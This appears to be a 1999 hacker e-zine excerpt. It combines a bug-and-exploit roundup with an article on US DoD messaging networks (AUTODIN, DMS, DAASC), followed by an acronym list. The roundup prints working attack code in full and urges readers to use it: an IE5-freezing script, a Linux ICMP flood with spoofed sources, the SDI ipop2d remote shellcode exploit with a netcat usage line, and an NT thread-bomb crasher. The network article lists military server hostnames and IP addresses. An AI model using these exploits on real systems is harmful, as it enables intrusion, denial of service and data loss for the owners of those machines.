if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx))
!= 0)
{
perror ("mount");
return 1;
}
/* Record mount point in /etc/mtab. */
mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1);
sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports);
mnt.mnt_dir = dir;
if (!(mtabf = setmntent (MTAB_FILE, "r+")))
{
perror ("setmntent");
return 1;
}
if (addmntent (mtabf, &mnt) < 0)
{
perror ("addmntent");
return 1;
}
if (endmntent (mtabf) < 0)
{
perror ("endmntent");
return 1;
}
return 0;
}
---
Microshaft are not having a good time (do they ever?). Another bug in IE5
was discovered. Put the following code into your web page to freeze IE and
stop script kiddies viewing your web site
-----cut here-----
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>
-----cut here-----
This will put the background colour in an infinite loop and freeze IE
---
Linux kernel 2.2.x seems to get into an awful mess when it is sent a large
number of some types of ICMP packages. To exploit this bug, use this:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
struct icmp_hdr
{
struct iphdr iph;
struct icmp icp;
char text[1002];
} icmph;
int in_cksum(int *ptr, int nbytes)
{
long sum;
u_short oddbyte, answer;
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1)
{
oddbyte = 0;
*((u_char *)&oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
struct sockaddr_in sock_open(char *address, int socket, int prt)
{
struct hostent *host;
if ((host = gethostbyname(address)) == NULL)
{
perror("Unable to get host name");
exit(-1);
}
struct sockaddr_in sin;
bzero((char *)&sin, sizeof(sin));
sin.sin_family = PF_INET;
sin.sin_port = htons(prt);
bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
return(sin);
}
void main(int argc, char **argv)
{
int sock, i, ctr, k;
int on = 1;
struct sockaddr_in addrs;
if (argc < 3)
{
printf("Usage: %s <ip_addr> <port>\n", argv[0]);
exit(-1);
}
for (i = 0; i < 1002; i++)
{
icmph.text[i] = random() % 255;
}
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("Can't set IP_HDRINCL option on socket");
}
if (sock < 0)
{
exit(-1);
}
fflush(stdout);
for (ctr = 0;ctr < 1001;ctr++)
{
ctr = ctr % 1000;
addrs = sock_open(argv[1], sock, atoi(argv[2]));
icmph.iph.version = 4;
icmph.iph.ihl = 6;
icmph.iph.tot_len = 1024;
icmph.iph.id = htons(0x001);
icmph.iph.ttl = 255;
icmph.iph.protocol = IPPROTO_ICMP;
icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
((random() % 255) * 65535) +
((random() % 255) * 255) +
(random() % 255);
icmph.iph.daddr = addrs.sin_addr.s_addr;
icmph.iph.frag_off = htons(0);
icmph.icp.icmp_type = random() % 14;
icmph.icp.icmp_code = random() % 10;
icmph.icp.icmp_cksum = 0;
icmph.icp.icmp_id = 2650;
icmph.icp.icmp_seq = random() % 255;
icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
{
if (errno != ENOBUFS) printf("X");
}
if (ctr == 0) printf("b00m ");
fflush(stdout);
}
close(sock);
}
---
Another one of those rare jewls came out earlier this month: a remote root
exploit. This time in ipop2d. use well:
---- SDI-pop2.c ------------------
/*
* Sekure SDI (Brazilian Information Security Team)
* ipop2d remote exploit for linux (Jun, 02 1999)
*
* by c0nd0r <condor@sekure.org>
*
* (read the instructions below)
*
* Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
* falcon, vader, c_orb, marty(nordo!) and minha malinha!
* also to #uground (irc.brasnet.org) and #SDI (efnet),
* guys at el8.org, toxyn.org, pulhas.org
*
* Sincere Apologizes: duke (for the mistake we made with the wu-expl),
* your code rocks.
*
* Usage:
*
* SDI-pop2 <imap_server> <user> <pass> [offset]
*
* where imap_server = IMAP server at your box (or other place as well)
* user = any account at your box
* pass = the account's password
* offset = 0 is default -- increase if it's necessary.
*
* Example: (netcat rocks)
*
* (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
*
* ----------------------------------------------------------------
* HOWTO-exploit:
*
* In order to gain remote access as user nobody, you should set
* an IMAP server at your box (just edit the inetd.conf) or at
* any other machine which you have an account.
*
* During the anonymous_login() function, the ipop2d will set the
* uid to user nobody, so you are not going to get a rootshell.
* ----------------------------------------------------------------
*
* We do NOT take any responsability for the consequences of using
* this code -- you've been warned! don't be a script k1dd13!
*
*/
#include <stdio.h>
/*
* (shellcode)
*
* jmp 0x1f
* popl %esi
* movl %esi,0x8(%esi)
* xorl %eax,%eax
* movb %eax,0x7(%esi)
* movl %eax,0xc(%esi)
* movb $0xb,%al
* movl %esi,%ebx
* leal 0x8(%esi),%ecx
* leal 0xc(%esi),%edx
* int $0x80
* xorl %ebx,%ebx
* movl %ebx,%eax
* inc %eax
* int $0x80
* call -0x24
* .string \"/bin/sh\"
* grab your shellcode generator at www.sekure.org
*/
char c0d3[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
main (int argc, char *argv[] ) {
char buf[2500];
int x,y=1000, offset=0;
long addr;
char host[255], user[255], pass[255];
int bsize=986;
if ( argc < 4) {
printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
printf ( "usage:
(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
exit (0);
}
snprintf ( host, sizeof(host), "%s", argv[1]);
snprintf ( user, sizeof(user), "%s", argv[2]);
snprintf ( pass, sizeof(pass), "%s", argv[3]);
if ( argc > 4) offset = atoi ( argv[4]);
/* gimme the ret + offset */
addr = 0xbffff3c0 + offset;
fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
/* calculation of the return address position */
bsize -= strlen ( host);
for ( x = 0; x < bsize-strlen(c0d3); x++)
buf[x] = 0x90;
for ( y = 0; y < strlen(c0d3); x++, y++)
buf[x] = c0d3[y];
for ( ; x < 1012; x+=4) {
buf[x ] = addr & 0x000000ff;
buf[x+1] = (addr & 0x0000ff00) >> 8;
buf[x+2] = (addr & 0x00ff0000) >> 16;
buf[x+3] = (addr & 0xff000000) >> 24;
}
sleep (1);
printf ( "HELO %s:%s %s\r\n", host, user, pass);
sleep (1);
printf ( "FOLD %s\r\n", buf);
}
----- EOF ---------------------
---
More problems in windoze9x, nt and all other versions at the moment, comes in
the handling of files named prn.* Because in old versions of DOS, this was
reserved as a way of accessing the printer, it will not let you create any
files named prn.* This is o.k, becuase windows won't let you create a file
with that name in any aplication. The problem, as usual with microshaft
products comes in the implementation of networking. If you are able to
access a file on a remote computer you can rename it to prn, and it will be
unremoveable.
This will only work if you access the remote computer using //computer/drive/*
it will not work if you map a network drive to your computer.
This could be a nasty flaw if someone done something like this: (talking DOS
now) rename //computer/c/program files //computer/c/prn this would mean that
the owner of the computer could not access, rename or delete his program
files directory and would probably lose all the data in the directory.
The only solution so far for this problem seems to be by using postix (a unix
emulator for windows) to remove the file. Unix to the rescue once again.
---
A few weeks ago MIRC 5.6 was released. This contains a serious vulnerability
in that if you mention a url in a window, mirc will automaticly tell your
browser to go to that page, oh no, more people with banners and this time you
can't stop it from opening up your web browser and telling it to access the
site.
---
Any of you code kiddies out there want to crash and NT workstation? A nice
little vulnerability that runs a large number of threads can crash it, and
you won't be able to bring up the task manager. Here is the code:
/*
* frootcake.c
* kiva@wookey.org
*
* this tests NT at coping with *really dodgy* code...
* it totally brings my SMP box to being unusable (SP5)
*/
#include <windows.h>
#include <stdio.h>
void poobah();
DWORD WINAPI thread_func (LPVOID lpv)
{
DWORD id;
HANDLE h;
BOOL success = 1;
h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
while (success){
switch (GetThreadPriority (h)){
case THREAD_PRIORITY_ABOVE_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_BELOW_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_HIGHEST:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_IDLE:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_LOWEST:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
}
}
poobah();
return 0;
}
void poobah()
{
DWORD id;
HANDLE h;
h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
poobah();
}
int main ()
{
printf ("frootcake - kiva@wookey.org\n");
poobah();
return 0;
}
---
As you always know, i like to save the best 'til last. Probably the most
serious hole found recently is a whole that affects 90% of windows servers on
the net, and allows you to execute code remotely. This is a
VERY serious
whole that can allow you to run any program you like, including netbus and
back orafice. got to: http://www.eeye.com/database/advisories/ad06081999/
ad06081999-exploit.html for more info
---
Thats all for now. All these bugs aren't garrenteed to work, i haven't
varified most of them so don't come bitching when they don't
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ DoD - DMS/AUTODIN ]::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]::::
-->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]:::::::::::::
Government/Military Defense Telecommunications Systems.
[AUTODIN] [DMS] [DSN] [DAASC DDN] [CSP] June 1999
by hybrid [ http://hybrid.dtmf.org hybrid@dtmf.org ]
-------------------------------------------------------
HI. This is a small article designed to be an introduction to the AUTODIN,
DMS and surrounding DSN government networks. It is not intended as a
definitive guide, I have only listed a few of many networks, it is more
focused on the summerisations and definitions of these networks :) So why
write an article on this subject?, Well basically I personaly find the
networks featured in this article very interesting, in the sense that I'm
curious as to why and how there where implemented and/or integrated with the
networks that exist today. I am in no way interested in gaining access to any
of these networks, All I have done here is done a little research through the
means of http, and news articles.
About this article..
In respect of the information sources of this article, any parts I have
copied, or used as an example are enclosed in speech marks (") or begun and
ended within a --- line. ALL of the information in this article has been
obtained from public domain resources, to find out more about the systems
and networks covered in this brief article, see the http links at the end of
the file. Thanks for reading this, hope you enjoy the article..
A U T O D I N
*************
DoD Automatic Digital Network (AUTODIN)
The AUTODIN digital network is a worldwide data communications network of the
Defense Communications System, and the US Department of Defense. It is
currently being upgraded and phased out by newer networks such as the DSN
(Defence Switched Network) and the Inter-Service/Agency Automated Message
Proccessing Exchange (I-S/A AMPE). This article will begin by focusing in on
the AUTODIN network, then progress to describe and summerise the more
contempory networks such as AMPE and the DSN. Currently the entire AUTODIN
network is being replaced mainly by the Defence Messaging System (DMS), again
I will discuss these networks in more detail after we've taken a look at
AUTODIN as you will provide better understanding of the newer networks.
The AUTODIN network is operated and maintained by the Defense Information
System Agency (DISA). The network is colosal in size and spans the globe,
and is intended for secret computer-controlled communications for the DoD,
and other Federal linked organisations and entitys. The whole system works on
a multi-level security platform, and operates using digital store and message
forwarding switching technolgys. Other majour government and military entitys
that use the AUTODIN network include the NSA (National Security Agency), the
DIA (Defense Intelligence Agency), and other well known organisations such as
NATO. Obviously the bodies that use the AUTODIN network for secure
communications can be very secretive, so the entire network was designed to
be extreamly secure with its user access levels. An external penetration of
this network would prove to be extreamly damaging to the the privacy of the
concerned government entitys, so it has been quite difficult to obtain raw
technical specifications of this network.
"National security could be affected if classified messages are not
delivered on secure lines in a timely manner."
The AUTODIN network can be accessed many ways, but primarily via the use of
a terminal called 'GateGuard'. GateGaurd operates on a desktop or laptop
computer, and is usually installed on AUTODIN subscriber premises. Origionaly
the AUTODIN network had to have human couriers to carry messages between
organisations by hand, now the GateGuard software does all that. The system
is designed to be an electronic gateway between the AUTODIN network and the
local phone office automation system (OAS). The idea is that no sensitive
messages or data can be lost during there travels through the OAS center. At
the moment, the gateway software is being used by many AUTODIN linked entitys
such as the Navy, the Army, Air Force Marine Corps, FAA, The Coast Guard, and
the DNA. The software is very versatile, but at the same time extreamly
secure. It enables users of the network to load the software onto there own
terminals, or laptops and then connect there STU III's (via the PSTN)
directly to the AUTODIN interface, essentialy forming a portable AUTODIN
terminal. The portable terminals can be linked to the AUTODIN network via
standard phone lines, cellualr lines, or via IMMARSAT (A Satelite network).
If you are like me you are probably thinking 'hey, this cant be secure..'
wrong: It appears that this kind of link is very secure, do you really think
the DoD would use non-secure phone lines as direct links to AUTODIN?.. To
get around this security flaw, the AUTODIN terminal system is operated by a
TCC telecommunications center, and links to and from the TCC implement
strong encryption techniqes such as KG Key Generators.
Of course, all phone/data networks need switches and routers, so the AUTODIN
network is controled and routed by a system called ASC (The AUTODIN Switching
Center). The system is one of the primary elements in the Defense
Communications System, and operates over high-speed secured data links
spanning the globe. The ASC system handles a large amount of classified data,
(4 million messages a month). The switching system consists of 14 trunks and
75 circuits and is connected to Defense communications centers accross the
world, the system also implements DCS HF radio to mobile forces on the
ground. The system also handles data traffic for highly classified aircraft
missions for the 1st and 99th airlift sqaudrons. The switching/routing system
was designed so well it bareley suffers any downtime, and would obviously be
extreamly secure.
The AUTODIN network was origionaly a backbone and stand-alone system,
serving as a primary network for secret data transmission. In June 1998, a
communications company managed to develop a system that would enable the
AUTODIN network to be connected to the SIPRNET Defense network. Because
SIPRNET is based upon the IP protocol, it was incompatable with the AUTODIN
protocols which operate over point-to-point leased lines. The new routing
system (by Sm@rtRouters) enables the two networks to operate similtaniously
integrating each others protocols (IP + leased lines). The system works by
integrating MDTs and AISs (Automated Information Systems) onto the SIPRNET
network. When an MDT/AIS sends a message, the locally connected router
translates the AUTODIN data stream into IP packets and sends them out on the
SIPRNET network. Then on the SIPRNET another router receives the IP packets,
translates them back into the AUTODIN format, and then passes the message to
its MDT or AIS. The sending and receiving MDTs and AISs are unaware that they
are communicating via the SIPRNET, therefore the whole system works just as
the older AUTODIN network did, but with the use of IP networks. The routing
works a little like ss#7 telephoney, whereas signals are looked up in
translation tables, and sorted in order of importance, or as the DoD would
say ('order of precedence').
The DMS System (Defense Messaging System) is one of the newest developments
designed to take place of the AUTODIN network. The new DMS network will be
fully implemented in august 1999, and as before will operate on highly
calssified information transmission links. The idea is to make the entire
DoD communications network fully automated, without the use of man-power in
the maintanance of network nodes etc. Again, the network is controled by the
DSA, and opertates on a message-to-reader protocol, I guess this eliminates
the securty flaws of similtanious message formats. The entire system is
proposed to be fully operational by the year 2OOO, and be fully accessable by
DoD members.
"DMS is a network-centric application that rides on the Defense
Information Systems Network."
The Defense Automatic Addressing System Center DDN..
Where non-AUTODIN communication is concerned, the DAASC system has been
implemented. The system covers other government networks such as DISN, SNA,
DECNET etc. The system operates over the DAASC DDN file format protocol,
and is designed for the exchange of data with accountablity and tracability.
To get access to the DDN, the subscribers are expected to submit a 'DAASC
DDN' questionare, which will then be passed though various channels until it
can be verified and approved for connection to the DDN network. Once the
applicant has been approved for connection to the network, they are given a
login and password, which is used to various file transfer protocols such as
FTP on the DDN servers. The applicant will first be made to login to one of
the servers at Dayton/Tracy on a test basis, there account will subseqentialy
be activated for future use. The DAASC DDN network servers are as follows,
-------------------->
The DAASC DDN circuits at DAASC Dayton, Ohio and DAASC Tracy, California
dayf1b.daas.dla.mil 198.97.76.200 * The DAASC system can be accessed
dayf2b.daas.dla.mil 198.97.76.201 * via many ways, icluding dialup,
dayf1.daas.dla.mil 192.67.251.15 * FTP etc. I do have the actual
dayf2.daas.dla.mil 192.67.251.16 * login procedures for each node,
* which I obtained from [public]
trafe1.daas.dla.mil 198.97.75.15 * HTTP, I feel it is un-nesasery to
trafe2.daas.dla.mil 198.97.75.16 * provide such details, as I am not
trafe1b.daas.dla.mil 198.97.74.15 * encouraging such access to these
trafe2b.daas.dla.mil 198.97.74.16 * networks and servers.
<--------------------
The DAASC network will terminate connectivity to the AUTODIN network at the
end of this year (1999). The DAASC system operates on many different software
and mechanisms. For example, a system called DAMES is designed to be run on
a DAASC network subscibers pc, and like conventional pstn communication, is
designed to implement phone lines as a means of transporting information with
the use of a standard modem.
------------------------->
" DAMES: DAAS Automated Message Exchange System. A connection between
user PC and DAAS via switched dial-up modem or via network (ftp)
connection. PC Software is furnished free of charge to United States
Government Activities and authorized Defense Contractors. "
" DIELOG: DAAS Integrated E-Mail Logistics System. Allows users to
transmit and receive data via their electronic mail system. "
" DDN: Defense Data Network. DAASC developed a capability, and
associated messaging format to support the exchange of JANAP-128 and
user defined variable length message data across the DDN/DISN using
the File Transfer Protocol (FTP). This capability has been in place
since mid 1993. The DDN file format is the preferred method of the
exchange of data between the DAASC, and our over 177,000 customers. "
" DARS: DAAS AUTODIN Replacement System. A suite of programs that were
developed to allow DAASC customers to transmit and receive data
pattern messages via their UNIX based systems. The software will
manage and control the transmission of data pattern traffic via
Defense Information Systems Network (DISN) utilizing the functions of
FTP. "
<-------------------------
Communications Support Processor (CSP)
The CSP is a message processing system that is designed to provide trusted
handeling of data traffic, it runs on a multi-level secure MLS mode operation
basis, for tactical communications. The CSP handles message switching and
security checks for communication throught the AUTODIN and surrounding
networks/systems. During the metamorph from AUTODIN to DMS, the CSP system
will run alongside and be integrated with TCP/IP encryption techniqes,
eventually the CSPs will be connected to satelite communication nodes, and
therefore eliminate the DoD's dependancy on the older AUTODIN network. The
CSP system will be used for secure writer-to-reader transmissions, using
protocols such as X.400/X.500 messaging formats. The CSP has been designed to
be able to convert DMS X.400 messages to the older AUTODIN format, and vice
versa, the TCP/IP encryption will be used to allow messages to be passed
though the JWICS WAN or SPECAT over the SIPRNET network, ensuring 'bullet-
proof' communication transmission. SMART (Secure Messaging and Routing
Terminal, is used to segregate less-sensitive information from the more
classified data, the SMART system is capable of delivering AUTODIN messages
to email users who are located either on the JWICS, SIPRNET or NIPRNET
communications networks. A 'secure' email techniqe has been developed for
this network that allows users on a secure LAN to send and recieve AUTODIN
messages via a Netscape browser, obviously Microshaft browsers where
incapable of supplying addiquit security for the DSN ;) The software is
called SMART:SecureMail, and is said to be capable of strict privacy and
authentification. Because of this network can contain very sensitive data,
the following security measures have been tested and implemented on the CSP..
-------------------->
Software Security Provisions
* TCP/IP Selectable Triple DES Encryption
* User authentication and verification with automatic password aging
* Advanced user permission schemes
* Security audit trail storage and retrieval
* Message level CRC on input and output
* Color coded security labels on all windows
* Link level and message level protocol handshaking
* Message security validation to input/output
* Redundant message file storage
* Send Authentication and Validation
* Operating System monitored and protected against unauthorized
intrusions.
Security/Accreditation/Certifications
* DIA accredited for consolidated R/Y communications with AUTODIN
* Certified DoDIIS Core/Key Product
* DISA Category I/III Certification
* Meets AMPE security requirements of DIA Cir 5030.58-M
* Accredited for MLS Mode of Operation (DCID 1/16 compliant)
<-----------------------
More on the Defense Messaging System (DMS)
The Defense Message System (DMS) is a DoD system designed to replace the
AUTODIN network, previously discussed in this article. The DMS Program was
established by the Under Secretary of Defense for Acquisition in order to
"facilitate and coordinate development of an integrated, common-user message
system" for organizational and individual users. The main concept of the DMS
system as said before is to reduce DoD costs on the demanding AUTODIN
networks, ie: the newer DMS network is more or less fully automated, the DMS
preogram is operated and maintained by the DISA (www.disa.mil). The older
less-advanced AUTODIN system has served as a secret communications network
for the DoD and surrounding orgainisations for over 30 years, and is said to
be at times very slow, and limited to textual data, it used to operate on
a 2.4 Kbps connection. The new DMS system is capable of both textual and
graphical messages with also multi-media attachments. The DMS service is
designed to provide 3 main services to it's subscribers.. Messaging,
Information Security, and Directory services.
----->
DMS Messaging Services
are built around an X.400 Message Transfer System (MTS), a collection of all
the system components which store and forward messages to the user at their
desktop computer. DMS compliant software, and in some cases hardware, are
required to access DMS messaging services.
DMS Information Security (INFOSEC) Services
use the National Security Agency's (NSA) Multi-level Information Systems
Security Initiative (MISSI) products to provide information security
services. Guards and firewalls provide security and a certain degree of
interoperability between different user communities. FORTEZZA cards, about
the size of inch thick credit card, provide encryption and digital signature
services at the desktop. Current DoD plans that each user be issued a
FORTEZZA card; however, this requirement may be relaxed in the near future so
that only organizational releasers need FORTEZZA cards. The FORTEZZA card is
inserted into the PCMCIA slot on a DMS compliant workstation.
DMS X.500 Directory Services
include a distributed global database that contains addressing and security
information about all DMS users. The Directory Services ensure messages sent
to organizations, collective addressees (CAD's) or individuals are properly
addressed. DMS compliant workstations, such as the CGSW-III, facilitate
access to DMS directory services.
<-----
The DMS system is designed to share telecommunications circuits with other
networks, unlike the previous AUTODIN network that used dedicated trunks.
Like all networks, the DMS has its own layer of physical and meta-physical
layers, in the case of DMS we see a hardaware layer and configuration,
software, and like other networks the DMS has it's own set of procedures and
standards. The DMS system can handle secure messaging via the X.400 message
protocol, ie: messaging--distribution--proccessing, the term for the DMS
messaging system is (Message Handeling System) or MHS. All these networks
are supposed to be very secure, I doubt the DoD would use them ubless they
undergo extream levels of security testing, the data that travels the DMS is
very sensitive so the DoD and other departments would not want a security
leak on there hands, therefore the DMS network has integrated security
features to ensure the privacy an protection of classified data. Some of
these security procedures and implementations are as follows..
--->
FORTEZZA Cards
**************
The FORTEZZA PCMCIA card provides four essential security services: data
confidentiality (privacy of information), data integrity (assures message is
unaltered), user non-repudiation (undeniable proof that the information was
sent by the sender), and user authentication (proof that the individual users
and hardware components are who or what they are supposed to be). The cards
use Type II encryption/decryption, data hashing, and digital (electronic)
signatures. Type II algorithms are those algorithms that have been approved
by the National Security Agency (NSA) for the protection of Sensitive But
Unclassified (SBU) information. NSA has approved the use of the Fortezza card
for Secret-high messages for an interim period. This policy is known as
"Fortezza for Classified" (FFC). In addition to these Type II algorithms,
FORTEZZA cards contains user certificates. Each certificate contains the name
of the issuer (the certification authority), expiration date, user name,
public key information, clearance level (e.g., Top Secret (TS), Secret (S),
Sensitive But Unclassified (SBU)) and privileges (e.g., message releaser).
Guards
******
The DMS Guard is used in the end-state DMS architecture to permit the
exchange of Secret DMS messages over an Unclassified backbone by protecting
the connection to the Unclassified backbone and by performing a check on all
outgoing messages to ensure that they were encrypted. The Guard also checks
to see if the message originator and/or recipients can send and/or receive
messages from a system-high enclave. In the SBU solution set, the Guard will
permit the exchange of Unclassified DMS messages between the Secret enclave
and an Unclassified enclave.
Firewalls
*********
The typical firewall ensures that only authorized message packets and service
requests are allowed to pass through the firewall. The firewall will protect
LANs, NIPRNET, Internet, or modem attack by blocking direct access to
unauthorized users. In addition to maintaining access controls to the
network, the firewall will maintain extensive audit records detailing both
successful and unsuccessful attempts to access the system.
Certification Authority Workstation (CAW)
*****************************************
The CAW is used to manage DMS X.500 certificates and program FORTEZZA
cryptographic cards with a user's security profile, including security
certificates, credentials and cryptographic key. The CA uses an
Administrative Directory User Agent (ADUA) to post the public portion of the
user's certificate to the Directory. Within the Coast Guard, it's expected
that CA duties will primarily be performed by the traditional CMS Custodian.
Organizational Registration Authority Workstation (ORAW)
********************************************************
The ORAW is a COTS workstation used by the Organizational Registration
Authority (ORA) at individual commands to assist the CA in the FORTEZZA card
management process. The ORAW enables the ORA to gather and format user
information for electronic submission to the CA in order to register the
user. This user information consists of the user's distinguished name (unique
DMS user name), release authorizations (e.g., organizational message,
individual message), and classification level (e.g., SBU, Secret). The ORAW
cannot sign user security certificates.
<----
Acronyms and abbreviations.
***************************
ACP-120 NATO classified X.400 message operation
ACP-123 Common Messaging Strategy & Procedures (X.400 Military Messaging)
ADNET Anti-Drug Network
ADUA Administrative Directory User Agent
API Application Programming Interface
ASC AUTODIN Switching Center
AUTODIN Automatic Digital Network
BAH Booz, Allen & Hamilton - Government Contractor
BMTA Backbone Message Transfer Agent
C3I Command, Control, Communications & Intelligence
C4I Command, Control, Communications, Computers & Intelligence
CA Certificate Authority
CAMS Communication Area Master Station (USCG)
CAP Component Approval Process
CARD Cost Analysis Requirements Document
CAW Certificate Authority Workstation
CCB Communications Configuration Board
CGDN Coast Guard Data Network (56Kbps backbone)
CGDN+ Coast Guard Data Network Plus (T1 backbone)
CGISS Coast Guard Intelligence Support System
CKL Compromised Key List
CMS Communications Security Material System
CN Common Name
CNO Chief, Naval Operations
COMDT Commandant USCG
COMSEC Communications Security
COTS Commercial Off-The-Shelf
CRL Certificate Revocation List
CS2K COMMSYS 2000 (USCG TISCOM)
CSSAMPS Classified Standard Semi-Automated Message Processing System
CTOS Convergent Technologies Operating System (SW-II)
DAA Designated Approving Authority
DAG DMS Advisory Group
DAP Directory Access Protocol
DAPP Defense AUTODIN Phase Out/DMS Phase In Plan
DIA Defense Intelligence Agency
DIB Directory Information Base
DISA Defense Information Systems Agency
DISN Defense Information Systems Network
DISP Directory Information Shadowing Protocol
DIT Directory Information Tree
DL Distribution List
DMS Defense Message System
DN Distinguished Name
DNS Distinguished Name Server
DON Department of the Navy
DRB Discrepancy Review Board
DSA Directory System Agent
DSP Directory System Protocol
DSS Digital Signature Standard
DSCS Defense Satellite Communications System
DUA Directory User Agent email Electronic Mail
EC/EDI Electronic Commerce/Electronic Data Interchange
ECP Emergency Command Precedence
EFA Engineering Field Activity
EI&A Enhanced Identification & Authentication
EOS Element of Service
ESL Enterprise Solutions, Ltd. (contractor)
EXM Enterprise eXtended Mail
FAMIS Fleet Automated Messaging Interface System
FFC Fortezza for Classified
FORTEZZA Personal credit card sized encryption device
FSP Functional Security & Performance (testing)
G/G Gate Guard
G-SCT Commandant, USCG Telecommunications Branch
GCC Global Control Center
GCCS Global Command & Control System
GCSS Global Combat Support System
GDS Global Directory Service
GENSER General Service (U, C, S, T)
GUI Graphic User Interface
HD Help Desk
HP Hewlett Packard
IDUA Integrated Directory User Agent
IEM Information Exchange Meeting
IG Implementation Group
IMTA Intermediate Message Transfer Agent
INE In-Line Network Encryption
IOC Initial Operational Capability
IOT&E Initial Operational Test & Evaluation
IP Internet Protocol
IPMS InterPersonal Message Service (P22 format)
IPT Integrated Process Team
IPWG Implementation Planning Working Group
ISO International Standards Organization
ISSO Information Systems Security Officer
ISWG Integrated Security Working Group
ITDS Information Transfer Distribution System
JANAP Joint Army Navy Air Force Publication
JMCISS
JWICS Joint Worldwide Intelligence Communication System
KEA Key Encryption Algorithm
KMID Key Material Identifier
KP Key Processor (LMD/KP)
LAN Local Area Network
LANTAREA Commander Atlantic Area USCG
LAT Logistics Action Team
LCC Local Control Center
LDAP Local Directory Access Protocol
LMD Local Management Device (LMD/KP)
LMFS Lockheed Martin Federal Systems
MADMAN Mail & Directory Management
MAFB Maxwell Air Force Base
MAISRC Major Acquisition Information Systems Review Committee
MAN Metro Area Network
MARCORPSYSCOM Marine Corps Systems Command
MCEB Military Communications Electronics Board
MCS Message Conversion System
MDT Message Distribution Terminal
MEK Message Encryption Key
MFG Multi-Function Gateway
MFI Multi-Function Interpreter
MHS Message Handling System
MIB Management Information Base
MIME Multi-purpose Internet Mail Extensions
MISSI Multi-Level Information System Security Initiative
ML Mail List
MLA Mail List Agent
MLS Multi-Level Security
MM Military Message
MMHS Military Message Handling System
MMS Multi-Level Mail Server
MPRS Message Prep & Review Software (USCG)
MROC Multi-Command Required Operational Characteristics
MS Message Store
MSP Message Security Protocol
MTA Message Transfer Agent
MTDS Message Transfer Distribution System
MTS Message Transfer System
MWS Management Work Station
NAVCOMPARS Naval Communications Processing & Routing System
NAVMACS Navy Modular Automated Communications System
NAVMACS II Navy Modular Automated Communications System 2nd Generation
NCP-II Naval Communications Processing & Routing System 2nd Generation
NCTAMS Naval Computer & Telecommunications Area Master Station
NCTC Naval Computer & Telecommunications Command
NCTS Naval Computer & Telecommunications Station
NDN Non Delivery Notice
NDR Non Delivery Report
NIPRNET Non-classified Internet Protocol Routed NETwork
NISE East Naval In Service Engineering East
NOVA NSA developed Message Handling System
NSA National Security Agency
NSANET National Security Agency Network
NSAP Network Service Access Point
NSM Network Security Manager
NSS Network Security System
O Operational Immediate Precedence
O/R Originator/Recipient
OA Operational Assessment
OLE Object Linking & Embedding
OM Operations Manager
OPWG Operations Planning Working Group
ORA Organizational Registration Authority
ORAW Organizational Registration Authority Work Station
OSC Operations Systems Center (USCG, Martinsburg, WV)
OSD(C3I) Office of the Secretary of Defense for Command, Control &
Communications
OT&E Operational Test & Evaluation
OU Organizational Unit
P Priority Precedence
P772 Military Message Format
PAA Policy Approving Authority
PACAREA Commander Pacific Area USCG
PCA Policy Creation Authority
PCMCIA Personal Computer Memory Card International Association
PDU Protocol Data Unit
PIN Personal Identification Number
PLA Plain-Language Address
PMO Program Management Office
PMSS Program Management Support System (Database)
PN Personal Name
POM Program Operating Memorandum
POP Point of Presence
PRMD Private Management Domains
PUA Profiling User Agent
R Routine Precedence
RCC Regional Control Center
RCDB Routing & Configuration Database
RCP Resource Change Proposal
RDN Relative Distinguished Name
RI Routing Indicators
ROMC Required Operational Messaging Characteristics
S/A Service Agency
SA System Administrator
SBU Sensitive But Unclassified
SCI Sensitive Compartmented Information
SCIF Sensitive Compartmented Information Facility
SDA System Design Architecture
